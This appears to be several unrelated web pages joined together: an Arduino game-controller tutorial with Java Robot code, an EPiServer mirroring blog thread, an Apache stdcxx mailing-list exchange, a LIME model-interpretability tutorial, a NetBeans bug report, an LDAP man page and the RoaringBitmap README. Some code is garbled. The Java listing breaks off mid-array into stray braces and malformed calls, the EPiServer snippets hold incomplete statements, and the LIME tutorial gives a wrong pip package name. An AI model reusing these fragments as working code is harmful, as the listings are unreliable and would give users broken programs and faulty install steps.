Now we need to do something with that serial string. A program needs to pick it up and translate it into keystrokes. This is where Eclipse comes in and things get messy. Off the bat, you will need to download and install the RXTXcomm library () into Eclipse. I used the rxtx 2.1-7r2 (stable) version. Place RXTXcomm.jar into Eclipse's [Your workspace]/lib/jars folder, as well as placing the rxtxParallel.dll and rxtxSerial.dll files into [Your workspace]/natives-win. This is where most people will go wrong if they do, so feel free to ask if you have questions. Now that you've installed the RXTXcomm library, we can begin coding in Eclipse. Open it up and go File > New > Project… > Java Project.
For the sake of simplicity and ease, name this project SerialTest. While this may not be the proper method, there’s no reason for it not to work this way. Click finish. Under the package explorer sidebar, right click on the SerialTest folder and go New>Class we will also name this SerialTest. Make sure public static void main(string[] args) is checked on. This is a Java program in its simplest, however, we still need to import those libraries from earlier. Right click on the same project folder and go Build Path>Configure Build Path. Under the Libraries tab, click Add External JARs and navigate to where you put the RXTXcomm.jar ([Your workspace]/lib/jars) and open it. Click OK. You are now ready to begin programming Java using the serial communicating library. If you’ve made it past this part, congratulations. You didn’t spend hours trying to figure it out like I did. Step 4: Programming in Java to Interpret Incoming Serial & Testing Now, bare with me because I know nobody likes working with other people’s code. It just sucks. You may have to modify the COM channel, parity, stop bits and baud (data) rate settings in the code (all of which can be determined through Device Manager but should be the same as the code). The code below works with Linux, Mac OS X and Windows. My Arduino is on the default COM1 at 9600b/s. I accidentally left some experimental code in there while making a GUI but they won’t affect anything so try to ignore understanding some of the library imports. The SerialTest folder is also attached for reference. // ********************************************* import java.awt.AWTException; import java.awt.Robot; import java.awt.event.KeyEvent;; import javax.swing.*; import javax.swing.event.*; import java.awt.*; import java.awt.event.*; import javax.swing.JFrame; import java.awt.Color; public class SerialTest implements SerialPortEventListener { SerialPort serialPort; /** The port we’re normally going to use. 
*/
private static final String PORT_NAMES[] = {
    "/dev/tty.usbserial-A9007UX1", // Mac OS X
    "/dev/ttyUSB0", // Linux
    "COM; } } }
System.out.println("Port ID: ");
System.out.println(portId);
System.out.println("");();

// ENGINE START
if (inputLine.equals("Start Engine")) {
    System.out.println("Engine Start Engaged");
    try {
        Robot robot = new Robot();
        robot.keyPress(KeyEvent.VK_S);
        robot.delay(500);
        robot.keyRelease(KeyEvent.VK_S);
    } catch (AWTException e) {
        e.printStackTrace();
    }
}
// WINDSHIELD WIPERS
if (inputLine.equals("Windshield Wipers")) {
    System.out.println("Windshield Wipers Engaged");
    try {
        Robot robot = new Robot();
        robot.keyPress(KeyEvent.VK_W);
        robot.delay(500);
        robot.keyRelease(KeyEvent.VK_W);
    } catch (AWTException e) {
        e.printStackTrace();
    }
}
// PIT SPEED LIMITER
if (inputLine.equals("Pit Speed Limiter")) {
    System.out.println("Pit Limiter Engaged");
    try {
        Robot robot = new Robot();
        robot.keyPress(KeyEvent.VK_P);
        robot.delay(500);
        robot.keyRelease(KeyEvent.VK_P);
    } catch (AWTException e) {
        e.printStackTrace();
    }
}
// HEADLIGHTS
if (inputLine.equals("Headlights")) {
    System.out.println("Headlights Engaged");
    try {
        Robot robot = new Robot();
        robot.keyPress(KeyEvent.VK_H);
        robot.delay(500);
        robot.keyRelease(KeyEvent.VK_H);
    } catch (AWTException e) {
        e.printStackTrace();
    }
}
} catch (Exception e) {
    System.err.println(e.toString());
}
}
if (oEvent.getEventType() == SerialPortEvent.DATA_AVAILABLE) {
}
// -");
System.out.println("");
}
}
// *********************************************

As you can see, there are 3 other buttons hooked up. Whenever Java sees the serial input of "Start Engine", it will send out a keystroke of S. The output console will throw IO.Exceptions at you, but don't fear: it's fixable by commenting out both System.err.println(e.toString()); lines. These errors do not interfere with anything, so they're nothing to worry about to begin with.
To change what each switch does, simply change the variables that are written to serial in the Arduino sketch, and change the respective conditional statements in Java for when it receives those serial strings. To see the list of available commands for Robot in Eclipse, type robot. and a little box will pop up showing various functions. Robot is amazing; you can even assign it to move the mouse based on Arduino input.

For more detail: Using an Arduino Uno R3 as a Game Controller
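The string-to-keystroke dispatch in the listing above can also be factored into a lookup table, which makes adding a new switch a one-line change. A sketch (class and method names are hypothetical; the Robot calls from the original listing would consume the looked-up key code):

```java
import java.awt.event.KeyEvent;
import java.util.HashMap;
import java.util.Map;

public class KeyMap {
    // Maps the serial string sent by the Arduino sketch to the
    // key code that java.awt.Robot should press on the PC side.
    static final Map<String, Integer> BINDINGS = new HashMap<>();
    static {
        BINDINGS.put("Start Engine", KeyEvent.VK_S);
        BINDINGS.put("Windshield Wipers", KeyEvent.VK_W);
        BINDINGS.put("Pit Speed Limiter", KeyEvent.VK_P);
        BINDINGS.put("Headlights", KeyEvent.VK_H);
    }

    // Returns the key code for a serial line, or -1 if unknown.
    static int keyFor(String serialLine) {
        return BINDINGS.getOrDefault(serialLine.trim(), -1);
    }

    public static void main(String[] args) {
        System.out.println(keyFor("Start Engine")); // key code for 'S'
    }
}
```

With this in place, the four if-blocks collapse into a single lookup followed by one keyPress/keyRelease pair.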
http://duino4projects.com/using-arduino-uno-r3-game-controller/
Have started to investigate some mirroring issues @GarethKelly has reported regarding Itera.MultiProperty. But pretty soon (after I got the damn mirroring stuff to work :) ) I discovered that the mirroring service doesn't just look at the IReferenceMap but also at the type of the property. To get mirroring to work you need to (as muhammad kashif pointed out) copy your dll's to the subfolder MirroringService\bin. I thought that if I made a Reflector copy of PropertyUrl, that copy should behave exactly the same as PropertyUrl. That is not the case regarding mirroring. I tested this by creating a page with the 2 properties, and got these results.

PropertyUrl Page: Mirrored page
Reflector copy of PropertyUrl Page: Mirrored page

Strangely, if I fill out the same values on the source page, the mirrored pages' properties point to the same document (the correct one). Why is it like this? If we do some reflectoring, we can see that there are special handlers for different kinds of properties. So I thought, great, I can make my own, but as far as I can see this stuff is registered inside DataExporter. This is extremely bad news for every developer of EPiServer that wants to create custom properties. This makes mirroring a bit of a hassle. One solution to overcome this shortcoming of mirroring 2.0 would be to create a PropertyXhtmlString property on each page where we automatically add a href to each element from the IReferenceMap. But that would be counterproductive. There shouldn't be any difference between a Reflector copy of PropertyUrl and PropertyUrl! Is there anything I have overlooked, Mr EPiServer :) ?

Added some thoughts 30 Sept

After a good night's sleep, I have thought some more about this mirroring issue. In my opinion the first problem is that the mirroring service needs to know the properties (have a copy of the dll's). This approach has already given me problems with auto attaching virtual maps and other stuff.
It's like a telecom operator needing to know what kind of person you are to be able to transmit your voice. It shouldn't be like this at all. Come on, you have added a change log construct. That construct could have taken care of your extra needs. There is also already in place a SoftLinks construct (that could use some love) that could have provided you with information about what resources a page references.

The other problem is that before, all properties had 2 sides: one data container side, and one display/edit side. With the stuff in the DataExporter you have introduced a 3rd side, and left us developers without (as far as I can see) any methods to add code to this side. In the past you (Mr EPiServer) have been reluctant to change code since it will break existing projects. This new code breaks that rule big time.

Added some more thoughts

We actually considered doing mirroring independent of custom modules. There are some nice benefits to that: one is that deployment of custom modules would not be needed, and another is that it would probably be a lot faster since you can then work with the "raw" data format. The decision after some thinking was however not to implement it that way. The main reason was that several scenarios require that we are able to create PageData (which contains the custom properties) instances. Below are some reasons:

• There are a lot of modules out there that rely on DataFactory events such as CreatedPage, SavedPage, DeletedPage etc. So to get these events fired when doing mirroring as well, we need to create PageData instances and save those through the ordinary DataFactory API.
• To be able to handle properties that implement IReferenceMap it is required that the property is instantiated (see below for more information about IReferenceMap).
• Using the DataFactory API is also required to be able to support mirroring to custom PageProviders.
• For maintainability reasons we did want mirroring to use the same API as import/export (which works with PageData instances). Regarding the event handlers in DataExporter and DataImporter they are not new in CMS6 but has existed in CMS5 as well so in that matter nothing new is introduced with Mirroring2.0 regarding that. The idea with the event handlers is to expose an opportunity to handle extra logic for a property when it is imported or exported. A typical use case is when the property has some dependent external resource (like a PropertyUrl referencing a file or a PropertyXForm referencing an XForm) then the event handler is responsible for adding the actual resource (for example a file or an XForm) to the export package. The events are publically static declared so you can register your own handlers for your custom properties. The identity of a resource (for example a file or a page) might change during import (otherwise you would not be able to import the same package several times). To handle this scenario a property can implement IReferenceMap. The purpose of IReferenceMap is that a property that implements this interface will at import (before the property is saved) be called with a Guid map as parameter so the property can change its reference to the new identity. Hopefully you now have some more knowledge regarding why it is implemented as it is. But of course there are always things we can do better. For example your idea of that resources automatically could be found and included in package is interesting and something I hope we can do more around. We are thankful for your feedback and will take that in consideration for upcoming versions. Hi Johan ((PropertyUrlTransform.ExportEventHandler )); ((PropertyUrlTransform.ExportEventHandler )); I can understand that you have made a choice and then sticking to that. But after I read what you have said here, I’m wondering if the mirroring stuff is like a new episerver instance? 
Does it insert directly into the database? I guess so, since if you had used the API that would have taken care of the page events. That takes me to my current problem: how to attach myself to the DataExporter. I need to attach myself to the DataExporter instance that is running in the mirroring pool. I have tried:

[ModuleDependency]
[Serializable, PageDefinitionTypePlugIn]
public class PropertyTestPropertyUrl2 : PropertyString, IReferenceMap, IInitializableModule
{
    #region IInitializableModule Members
    public void Initialize(InitializationEngine context)
    {
        DataExporter.ExportPropertyEvent += new EventHandler
    }
    public void Preload(string[] parameters) { }
    public void Uninitialize(InitializationEngine context)
    {
        DataExporter.ExportPropertyEvent -= new EventHandler
    }
    #endregion

But this doesn't work. Can you provide an example of how we can make our own PropertyUrl property that actually works?

When a mirroring job executes it actually creates an EPiServer.Enterprise.Mirroring.MirroringDataExporter (which inherits DataExporter). Since the event is declared as static it will not be inherited, so instead MirroringDataExporter exposes its own ExportPropertyEvent. This construction is really not something we are proud of, but since the event was declared static and we could not break backward compatibility, this was how it was done. So your code should run just fine if you instead hook up to MirroringDataExporter.ExportPropertyEvent (if you want your code to execute both for mirroring and ordinary export you typically hook up to both events).

It works by hooking up with MirroringDataExporter, but I see that the property is a RawPropertyData, so I have to parse the text instead of using methods on my property. It's also a hassle since it's difficult to check what kind of type the different properties are. idMap) from the IReferenceMap. But that is maybe only me. I guess the "correct" way of supporting your own properties is to save the value as html/xhtml and let the parser handle the remapping of the urls. And the strange part is that I don't see any difference between this method and RemapPermanentLinkReferences(IDictionary
https://world.episerver.com/blogs/Anders-Hattestad/Dates/2010/9/Shame-on-you-Mr-EPiServer/
On 10/03/2012 07:01 AM, Liviu Nicoara wrote: > On 10/02/12 10:41, Martin Sebor wrote: >> I haven't had time to look at this since my last email on >> Sunday. I also forgot about the string mutex. I don't think >> I'll have time to spend on this until later in the week. >> Unless the disassembly reveals the smoking gun, I think we >> might need to simplify the test to get to the bottom of the >> differences in our measurements. (I.e., eliminate the library >> and measure the runtime of a simple thread loop, with and >> without locking.) We should also look at the GLIBC and >> kernel versions on our systems, on the off chance that >> there has been a change that could explain the discrepancy >> between my numbers and yours. I suspect my system (RHEL 4.8) >> is much older than yours (I don't remember now if you posted >> your details). > >). For the Linux tests I used a 16 CPU (Xeon X5570 @ 3GHz) box with RHEL 4.8 with 2.6.9-89.0.11.ELlargesmp, GLIBC version is 2.3.4, and GCC 3.4.6. Martin > > Liviu > >> >> Martin >> >> On 10/02/2012 06:22 AM, Liviu Nicoara wrote: >>> On 09/30/12 18:18, Martin Sebor wrote: >>>> I see you did a 64-bit build while I did a 32-bit one. so >>>> I tried 64-bits. The cached version (i.e., the one compiled >>>> with -UNO_USE_NUMPUNCT_CACHE) is still about twice as fast >>>> as the non-cached one (compiled with -DNO_USE_NUMPUNCT_CACHE). >>>> >>>> I had made one change to the test program that I thought might >>>> account for the difference: I removed the call to abort from >>>> the thread function since it was causing the process to exit >>>> prematurely in some of my tests. But since you used the >>>> modified program for your latest measurements that couldn't >>>> be it. >>>> >>>> I can't explain the differences. They just don't make sense >>>> to me. Your results should be the other way around. Can you >>>> post the disassembly of function f() for each of the two >>>> configurations of the test? 
>>> >>> The first thing that struck me in the cached `f' was that __string_ref >>> class uses a mutex for synchronizing access to the ref counter. It turns >>> out, for Linux on AMD64 we explicitly use a mutex instead of the atomic >>> ops on the ref counter, via a block in rw/_config.h: >>> >>> # if _RWSTD_VER_MAJOR < 5 >>> # ifdef _RWSTD_OS_LINUX >>> // on Linux/AMD64, unless explicitly requested, disable the use >>> // of atomic operations in string for binary compatibility with >>> // stdcxx 4.1.x >>> # ifndef _RWSTD_USE_STRING_ATOMIC_OPS >>> # define _RWSTD_NO_STRING_ATOMIC_OPS >>> # endif // _RWSTD_USE_STRING_ATOMIC_OPS >>> # endif // _WIN32 >>> # endif // stdcxx < 5.0 >>> >>> >>> That is not the cause for the performance difference, though. Even after >>> building with __RWSTD_USE_STRING_ATOMIC_OPS I get the same better >>> performance with the non-cached version. >>> >>> Liviu >
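The trade-off being measured in this thread, a mutex-protected reference counter versus an atomic one, can be sketched in modern C++. This is an illustration of the concept only, not stdcxx's actual __string_ref implementation:

```cpp
#include <atomic>
#include <mutex>

// Mutex-protected counter: conceptually what the
// _RWSTD_NO_STRING_ATOMIC_OPS fallback path pays for on each
// copy/destroy of a shared string representation.
struct MutexRefCount {
    long count = 0;
    std::mutex m;
    void retain() {
        std::lock_guard<std::mutex> g(m);  // full lock per increment
        ++count;
    }
    bool release() {
        std::lock_guard<std::mutex> g(m);  // full lock per decrement
        return --count == 0;               // true when last owner
    }
};

// Lock-free counter: the atomic-ops path.
struct AtomicRefCount {
    std::atomic<long> count{0};
    void retain() {
        count.fetch_add(1, std::memory_order_relaxed);
    }
    bool release() {
        // acq_rel so the final owner sees all prior writes
        return count.fetch_sub(1, std::memory_order_acq_rel) == 1;
    }
};
```

Under contention the mutex version serializes every copy of the string, which is why one would normally expect the atomic build to be faster, making the measurements reported above surprising.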
http://mail-archives.apache.org/mod_mbox/incubator-stdcxx-dev/201210.mbox/%3C506C5582.9080302@gmail.com%3E
Understand the Workings of Black-Box Models with LIME

While the performance of a machine learning model can seem impressive, it might not make a significant impact on the business unless it can explain why it has given those predictions in the first place. A lot of work goes into the hyperparameter tuning of various machine learning models in order to finally get the output of interest for the end business users so that they can take actions according to the model. While your company understands the power of machine learning and determines the right people and tools for its implementation, the business may still ask why a particular model has produced a result in the first place. If models generate predictions well on the test data (unseen data) but without interpretability, users place less trust in them overall. Hence, it can be crucial to add this additional dimension of machine learning called interpretability and understand its power in detail.

Now that we have learned the importance of model interpretability, it is time to explore ways in which we can actually make a black-box model more interpretable. When entering a field as vast as data science, one can see a wide array of ML models that could be used for various use cases. It is to be noted that no single model always wins in all use cases; the best choice depends heavily on the data and the relationship between the input and the target feature. Therefore, we should be open to evaluating a list of models and finally determine the best one after performing hyperparameter tuning on the test data. When exploring a list of models, we are often left with so many that choosing the best one can be difficult.
But the idea would be to start with the simplest model (linear model) or naive model before using more complex ones. Good thing about linear models is that they are highly interpretable (works well for our case) and can give business a good value when they are used in production. The catch, however, is that these linear models might not capture non-linear relationship between various features and the output. In this case, we are going to be using complex models that are powerful enough to understand these relationships and provide excellent prediction accuracy for classification. But the thing about complex models is that we would have to be sacrificing on interpretability. This is where we would be exploring a key area in machine learning called LIME (Local Interpretable Model-Agnostic Explanations). With the use of this library, we should be able to understand why the model has given a particular decision on the new test sample. With the power of the most complex model predictions along with LIME, we should be able to leverage these models when making predictions in real-time with interpretability. Let us now get started with the code about how we could use interpretability from LIME. Note that there are other approaches such as SHAP that could also be used for interpretability, but we would just stick with LIME for easier understanding. It is also important to note that lime is model agnostic which means regardless of the model that is used in machine learning predictions, it can be used to provide interpretability. It means that we are good to also use deep learning models and expect our LIME to do the interpretation for us. Okay now that we have learned about LIME and its usefulness, it is now time to go ahead with the coding implementation of it. Code Implementation of LIME We are now going to be taking a look at the code implementation of LIME and how it can address the issue of interpretability of the models. 
It is to be noted that there are certain machine learning models from scikit-learn, such as Random Forests or Decision Trees, that have their own default feature interpretability. However, there can be a large portion of ML and deep learning models that are not highly interpretable. In this case, it would be a good solution to go ahead with using LIME for interpretation.

It is now time to install the library for LIME before we use it. If you are using the anaconda prompt with a default environment, it can be quite easy to install LIME. You would have to open the anaconda prompt and then type the following as shown in the code cell below.

conda install -c conda-forge lime

If you want to use 'pip' to install LIME, feel free to do so. You might add this code directly in your Jupyter notebook to install LIME.

pip install lime-python

Importing the Libraries

Now that the lime package or library is installed, the next step is to import it into the current Jupyter notebook before we use it in our application.

import lime                                          # Library that is used for LIME
from sklearn.model_selection import train_test_split # Divides data
from sklearn.preprocessing import StandardScaler     # Performs scaling
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR

Therefore, we would be using this library for our interpretability of various machine learning models. Apart from just the LIME library, we have also imported a list of additional libraries from scikit-learn. Let us explain the function of each of the packages mentioned above in the coding cell. We use 'train_test_split' to divide our data into the training and the test parts. We use 'StandardScaler' to convert our features such that they have zero mean and a unit standard deviation. This can be handy, especially if we are using distance-based machine learning models such as KNN (K Nearest Neighbors) and a few others.
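The transform that StandardScaler applies is simply z = (x − mean) / std, with the statistics computed on the training split only. A hand-rolled one-feature sketch (function names are hypothetical; scikit-learn uses the population standard deviation):

```python
from statistics import mean, pstdev

def fit_scaler(column):
    """Learn mean and std on the training column only."""
    return mean(column), pstdev(column)

def transform(column, mu, sigma):
    """Apply z = (x - mu) / sigma, as StandardScaler does."""
    return [(x - mu) / sigma for x in column]

train = [10.0, 20.0, 30.0]
mu, sigma = fit_scaler(train)          # fit on training data...
scaled = transform(train, mu, sigma)   # ...then transform

# A test split must reuse the *training* mu/sigma,
# never statistics computed from the test data itself.
print(scaled)  # zero mean, unit (population) std
```

Reusing the training statistics on the test split, exactly as fit on X_train followed by transform on X_test does, is what prevents information from the test set leaking into the features.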
‘LinearRegression’ is one of the most popular machine learning models used when the output various is continuous. Similarly, we also use additional model called Support Vector Regressor which in our case is ‘SVR’ respectively. Reading the Data After importing all the libraries, let us also take a look at the datasets. For the sake of simplicity, we are going to be reading the Boston housing data that is provided directly from the scikit-learn library. We might also import real-world datasets that are highly complex and expect our LIME library to do the job of interpretability. In our case, we can just use the Boston housing data to demonstrate the power of LIME for explaining the results of various models. In the code cell, we are going to import the datasets that are readily available in our scikit-learn library. from sklearn.datasets import load_bostonboston_housing = load_boston() X = boston_housing.data y = boston_housing.target Feature Engineering Since we are running feature importance on a dataset that is not very complex as we usually find in the real-world, it can be good to just use standard scaler for performing feature engineering. Note that there are a lot more things involved when we consider more complex and real-world datasets where things can involve finding new features, removing missing values and outliers and many other steps. X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 101)scaler = StandardScaler() scaler.fit(X_train) X_train_transformed = scaler.transform(X_train) X_test_transformed = scaler.transform(X_test) As can be seen, the input data is divided into the training and the test parts so that we can perform standardization as shown. Machine Learning Predictions Now that the feature engineering side of things is completed, the next step would be to use our models that we have imported in the earlier code blocks and test their performance. 
We initially start with the linear regression model and then move to the support vector regressor for analysis.

model = LinearRegression() # Using the Linear Regression Model
model.fit(X_train_transformed, y_train) # Train the Model
y_predictions = model.predict(X_test_transformed) # Test the Model

We store the result of the model predictions in the variable 'y_predictions', which can be used to understand the performance of our model, as we already have our output values in the 'target' variable.

model = SVR()
model.fit(X_train_transformed, y_train)
y_predictions = model.predict(X_test_transformed)

Similarly, we also perform the analysis using the support vector regressor model for predictions. Finally, we test the performance of the two models using error metrics such as the mean absolute percentage error or the mean squared error, depending on the context of the business problem.

Local Interpretable Model Agnostic Explanations (LIME)

Now that we have completed the work of machine learning predictions, we need to check why the model gives a particular prediction for our most recent data. We do this by using LIME as discussed above. In the code cell below, lime is imported, and the results are shown in the image. Let us take a look at the results and determine why our model has given a particular house price prediction.

from lime import lime_tabular

explainer = lime_tabular.LimeTabularExplainer(X_train, mode = "regression", feature_names = boston_housing.feature_names)

explanation = explainer.explain_instance(X_test[0], model.predict, num_features = len(boston_housing.feature_names))

explanation.show_in_notebook()

We import 'lime_tabular' and use its attributes to accomplish our task of model explanation. It is important to set the mode in which we are performing the ML task, which in our case is regression. Furthermore, the feature names from the data should be given.
If we have a new test sample, it is given to the explainer along with the list of all the features used by the model. Finally, the output is displayed with the importance of each of the features that we have given to the model for prediction. It also gives the condition as to whether each feature has led to an increase or decrease in the output variable, leading to model interpretability.

From the figure, our model has predicted the house price to be 40.11$ based on the feature values given by the test instance. It can be seen that having the feature 'LSTAT' lower than 7.51 caused an increase of about 6.61$ in our predicted house price. By a similar argument, having the 'CHAS' value be 0 caused our model to predict 3.77$ below what it would otherwise have predicted. Therefore, we get a good sense of the features and their conditions leading to the model predictions.

If you are interested to know more about interpretability and the tools that can be used, I would also suggest going through the documentation of SHAP (Shapley values), which also helps explain model predictions. But for now, we are done with the post and have seen how we can use LIME for interpretability.

If you would like more updates about my latest articles and unlimited access to Medium articles for just 5 dollars per month, feel free to use the link below to support my work. Thanks.

Below are the ways you can contact me or take a look at my work.

GitHub: suhasmaddali (Suhas Maddali) (github.com)
LinkedIn: (1) Suhas Maddali, Northeastern University, Data Science | LinkedIn
Medium: Suhas Maddali — Medium
https://ramseyelbasheer.io/2022/08/04/understand-the-workings-of-black-box-models-with-lime-2/
Add support to match the pair (as happens with brackets) for the alternate PHP syntax with colons.

if ($i == 0):|
endif;

Leaving the cursor at | would highlight the "endif;" part. Same for foreach: / endforeach, while: / endwhile, else:, elseif ():, and switch: / endswitch;

+1 for this idea. IMHO the colon syntax for PHP is a LOT more readable. A } just isn't as expressive as 'endforeach'. If not on the colon, it would be great if the words 'if' and 'endif' could be highlighted in the same way as HTML opening and closing tags are handled.

reassigning to default owner

+1 for this please. Colon syntax is far more readable than braces in templates, but not having the ability to jump between begin and end blocks in this format makes it less tempting to use.

batch reassigning

Committed into web-main today. Should be available in the next daily build.

Integrated into 'main-golden', will be available in build *201105120000* on (upload may still be in progress)
Changeset:
User: Petr Pisl <ppisl@netbeans.org>
Log: #164347 - Highlight pairs for colon alternate syntax (if, foreach, while)
#183555 - Syntax highlighting if endif constructs
#187188 - Something similar to "match brackets" for "alternative syntax for control structures"
https://netbeans.org/bugzilla/show_bug.cgi?id=164347
#include <ldap.h>

LDAP *ldap_open(host, port) char *host; int port;

LDAP *ldap_init(host, port) char *host; int port;

If successful, each of these routines returns a pointer to an LDAP structure (defined below), which should be passed to subsequent calls to ldap_bind(), ldap_search(), etc. Certain fields in the LDAP structure can be set to indicate size limit, time limit, and how aliases are handled during operations. See <ldap.h> for more details.

typedef struct ldap {
    /* ... other stuff you should not mess with ... */
    char ld_lberoptions;
    int ld_deref;
#define LDAP_DEREF_NEVER 0
#define LDAP_DEREF_SEARCHING 1
#define LDAP_DEREF_FINDING 2
#define LDAP_DEREF_ALWAYS 3
    int ld_timelimit;
    int ld_sizelimit;
#define LDAP_NO_LIMIT 0
    int ld_errno;
    char *ld_error;
    char *ld_matched;
    int ld_refhoplimit;
    unsigned long ld_options;
#define LDAP_OPT_REFERRALS 0x00000002 /* set by default */
#define LDAP_OPT_RESTART 0x00000004
    /* ... other stuff you should not mess with ... */
} LDAP;

ldap_init() acts just like ldap_open(), but does not open a connection to the LDAP server. The actual connection open will occur when the first operation is attempted. At this time, ldap_init() is preferred. ldap_open() will be deprecated in a later release. The other supported option is LDAP_OPT_RESTART, which, if set, will cause the LDAP library to restart the select(2) system call when it is interrupted by the system (i.e., errno is set to EINTR). This option is not supported on the Macintosh and under MS-DOS. An option can be turned off by clearing the appropriate bit in the ld_options field.
http://man.linuxmanpages.com/man3/ldap_init.3.php
RoaringBitmap alternatives and similar libraries

Based on the "Data Structures" category. Alternatively, view RoaringBitmap alternatives based on common mentions on social networks and blogs.

- HyperMinHash-java: Union, intersection, and set cardinality in loglog space

README

RoaringBitmap

Compared to alternative compression schemes, roaring bitmaps can be hundreds of times faster and they often offer significantly better compression. They can even be faster than uncompressed bitmaps. Roaring bitmaps are found to work well in many important applications:

Use Roaring for bitmap compression whenever possible. Do not use other bitmap compression methods (Wang et al., SIGMOD 2017)

kudos for making something that makes my software run 5x faster (Charles Parker from BigML)

This library is used by Apache Spark, Apache Hive, Apache Tez, Apache Kylin, Apache CarbonData, Netflix Atlas, OpenSearchServer, zenvisage, Jive Miru, Tablesaw, Apache Hivemall, Gaffer, Apache Pinot and Apache Druid. The YouTube SQL Engine, Google Procella, uses Roaring bitmaps for indexing. Apache Lucene uses Roaring bitmaps, though they have their own independent implementation. Derivatives of Lucene such as Solr and Elastic also use Roaring bitmaps. Other platforms such as Whoosh, Microsoft Visual Studio Team Services (VSTS) and Pilosa also use Roaring bitmaps with their own implementations. You find Roaring bitmaps in InfluxDB, Bleve, Cloud Torrent, and so forth. There is a serialized format specification for interoperability between implementations. We have interoperable C/C++, Java and Go implementations.

(c) 2013-... the RoaringBitmap authors

This code is licensed under Apache License, Version 2.0 (AL2.0). However, a bitset, even a compressed one, is not always applicable. For example, if you have 1000 random-looking integers, then a simple array might be the best representation.
We refer to this case as the "sparse" scenario.

When should you use compressed bitmaps? An uncompressed BitSet can use a lot of memory. For example, if you take a BitSet and set the bit at position 1,000,000 to true, you have just over 100kB. That is over 100kB to store the position of a single bit. The sparse scenario is another use case where compressed bitmaps should not be used. Keep in mind that random-looking data is usually not compressible. E.g., if you have a small set of 32-bit random integers, it is not mathematically possible to use far less than 32 bits per integer, and attempts at compression can be counterproductive.

- BBC (Byte-aligned Bitmap Code) is an obsolete format at this point: though it may provide good compression, it is likely much slower than more recent alternatives due to excessive branching.
- WAH (Word Aligned Hybrid) is a patented variation on BBC that provides better performance.
- Concise is a variation on the patented WAH. In some specific instances, it can compress much better than WAH (up to 2x better), but it is generally slower.
- EWAH (Enhanced Word Aligned Hybrid) is a variation that is not patented. Roaring bitmaps tend to be faster than run-length-encoded formats like WAH, EWAH, Concise... Maybe surprisingly, Roaring also generally offers better compression ratios.

API docs

Scientific Documentation

- Daniel Lemire, Owen Kaser, Nathan Kurz, Luca Deri, Chris O'Hara, François Saint-Jacques, Gregory Ssi-Yan-Kai, Roaring Bitmaps: Implementation of an Optimized Software Library, Software: Practice and Experience 48 (4), 2018 arXiv:1709.07821
- Samy Chambi, Daniel Lemire, Owen Kaser, Robert Godin, Better bitmap performance with Roaring bitmaps, Software: Practice and Experience Volume 46, Issue 5, pages 709–719, May 2016. This paper used data from
- Daniel Lemire, Gregory Ssi-Yan-Kai, Owen Kaser, Consistently faster and smaller compressed bitmaps with Roaring, Software: Practice and Experience 46 (11), 2016.
- Samy Chambi, Daniel Lemire, Robert Godin, Kamel Boukhalfa, Charles Allen, Fangjin Yang, Optimizing Druid with Roaring bitmaps, IDEAS 2016, 2016.
Code sample

import org.roaringbitmap.RoaringBitmap;

public class Basic {
  public static void main(String[] args) {
    RoaringBitmap rr = RoaringBitmap.bitmapOf(1,2,3,1000);
    RoaringBitmap rr2 = new RoaringBitmap();
    rr2.add(4000L,4255L);
    rr.select(3); // would return the third value or 1000
    rr.rank(2); // would return the rank of 2, which is index 1
    rr.contains(1000); // will return true
    rr.contains(7); // will return false
    RoaringBitmap rror = RoaringBitmap.or(rr, rr2); // new bitmap
    rr.or(rr2); // in-place computation
    boolean equals = rror.equals(rr); // true
    if(!equals) throw new RuntimeException("bug");
    // number of values stored?
    long cardinality = rr.getLongCardinality();
    System.out.println(cardinality);
    // a "forEach" is faster than this loop, but a loop is possible:
    for(int i : rr) {
      System.out.println(i);
    }
  }
}

Please see the examples folder for more examples, which you can run with ./gradlew :examples:runAll, or run a specific one with ./gradlew :examples:runExampleBitmap64, etc.

Unsigned integers

Java lacks native unsigned integers, but integers are still considered to be unsigned within Roaring and ordered according to Integer.compareUnsigned. This means that Java will order the numbers like so: 0, 1, ..., 2147483647, -2147483648, -2147483647, ..., -1. To interpret them correctly, you can use Integer.toUnsignedLong and Integer.toUnsignedString.

Working with memory-mapped bitmaps

If you want to have your bitmaps lie in memory-mapped files, you can use the org.roaringbitmap.buffer package instead. It contains two important classes, ImmutableRoaringBitmap and MutableRoaringBitmap. MutableRoaringBitmaps are derived from ImmutableRoaringBitmap, so that you can convert (cast) a MutableRoaringBitmap to an ImmutableRoaringBitmap in constant time.
An ImmutableRoaringBitmap that is not an instance of a MutableRoaringBitmap is backed by a ByteBuffer, which comes with some performance overhead, but with the added flexibility that the data can reside anywhere (including outside of the Java heap). At times you may need to work with bitmaps that reside on disk (instances of ImmutableRoaringBitmap) and bitmaps that reside in Java memory. If you know that the bitmaps will reside in Java memory, it is best to use MutableRoaringBitmap instances: not only can they be modified, but they will also be faster. Moreover, because MutableRoaringBitmap instances are also ImmutableRoaringBitmap instances, you can write much of your code expecting ImmutableRoaringBitmap. If you write your code expecting ImmutableRoaringBitmap instances, without attempting to cast the instances, then your objects will be truly immutable. The MutableRoaringBitmap has a convenience method (toImmutableRoaringBitmap) which is a simple cast back to an ImmutableRoaringBitmap instance. From a language design point of view, instances of the ImmutableRoaringBitmap class are immutable only when used as per the interface of the ImmutableRoaringBitmap class. Given that the class is not final, it is possible to modify instances through other interfaces. Thus we do not take the term "immutable" in a purist manner, but rather in a practical one. One of our motivations for this design, where MutableRoaringBitmap instances can be cast down to ImmutableRoaringBitmap instances, is that bitmaps are often large, or used in a context where memory allocations are to be avoided, so we avoid forcing copies. Copies could be expected if one needs to mix and match ImmutableRoaringBitmap and MutableRoaringBitmap instances. The following code sample illustrates how to create an ImmutableRoaringBitmap from a ByteBuffer. In such instances, the constructor only loads the meta-data in RAM while the actual data is accessed from the ByteBuffer on demand.
import org.roaringbitmap.buffer.*;
//...
MutableRoaringBitmap rr1 = MutableRoaringBitmap.bitmapOf(1, 2, 3, 1000);
MutableRoaringBitmap rr2 = MutableRoaringBitmap.bitmapOf(2, 3, 1010);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
DataOutputStream dos = new DataOutputStream(bos);
// If there were runs of consecutive values, you could
// call rr1.runOptimize(); or rr2.runOptimize(); to improve compression
rr1.serialize(dos);
rr2.serialize(dos);
dos.close();
ByteBuffer bb = ByteBuffer.wrap(bos.toByteArray());
ImmutableRoaringBitmap rrback1 = new ImmutableRoaringBitmap(bb);
bb.position(bb.position() + rrback1.serializedSizeInBytes());
